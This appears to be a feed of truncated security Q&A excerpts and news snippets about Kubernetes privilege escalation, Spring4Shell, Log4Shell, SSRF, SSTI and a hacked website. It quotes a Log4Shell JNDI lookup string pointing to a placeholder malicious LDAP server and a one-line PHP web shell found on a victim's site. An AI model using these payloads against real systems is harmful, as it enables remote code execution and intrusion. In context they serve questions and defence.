Collaborate Disseminate
I am exploring CVE 2018-1002105 about privilege escalation vulnerabilities in Kubernetes. As a remote unuauthenticated user, I would want to make use of a metrics server deployed on my cluster to exec arbitrary commands on any pod.
I am qu… Continue reading Kubernetes user impersonation to obtain exec privileges
New York times just ran an article titled "U.S. Says It Secretly Removed Malware Worldwide, Pre-empting Russian Cyberattacks" that stated
The United States said on Wednesday that it had secretly removed
malware from computer net… Continue reading New York Times article about FBI secretly removing malware from U.S. corporate servers – would this indicate they have a government backdoor?
Web applications created in the Spring platform could leave users open to remote code execution, CISA and others are warning.
The post ‘Spring4Shell’ bug in framework for Java programming draws widespread warnings appeared first on CyberScoop.
Continue reading ‘Spring4Shell’ bug in framework for Java programming draws widespread warnings
I’m testing an application that allows the user to provide an XML file that will be processed. (I’ve already tried typical XML attacks, such as XXE.) One of the elements of the XML file allows the user to specify a .NET type that will load… Continue reading RCE through specifying .NET type or namespace?
Considering how log4shell seems trivial to exploit and the important control level it gives to an attacker, should we wipe everything affected and start over?
For example, we find out that a publicly accessible server in production has log… Continue reading Log4shell – Should affected servers be "nuked from the orbit"?
A zero-day exploit affecting the popular Apache Log4j utility
(CVE-2021-44228) was made public on December 9, 2021 that results in
remote code execution (RCE). (From an email CloudFlare sent to users)
Is a site susceptible to the Log4J e… Continue reading Can one protect from the Log4j exp by sanitizing the parameters?
Does the JNDI URL need to be the full string being logged or could it be just a part of a logged string?
For example, if the code contains:
paramGivenFromOutside = "${jndi:ldap://maliciousServer:1389/maliciousApp}";
logger.debug… Continue reading Does the log4j RCE vulnerability run even if the message is just a part of the logged string?
Say I’ve found a perfect SSRF vulnerability in a web application that lets me send web requests to any URL, any host, any port, any scheme. I can use the file:// scheme to get the contents of local files, such as file:///C:/Windows/win.ini… Continue reading Uploading/writing server files via SSRF?
I’m a newbie ethical hacker and bug bounty hunter. Lets, assume my target is somethingtohack.com, the thing is the company’s scope defines that the main domain is out of scope, but subdomains like subdomain.somethingtohack.com are in scope… Continue reading Can I escalate a main domain SSTI/RCE to all the subdomains belonging to that domain?
On my website I found a file containing this code
<?php if(isset($_POST[z]))eval($_POST[z]);?>
It’s my understanding that the hacker is using this to execute any PHP command send via a POST request.
I’m trying to see how this file g… Continue reading Need guidance on detecting how a hacked file got upload on my website [duplicate]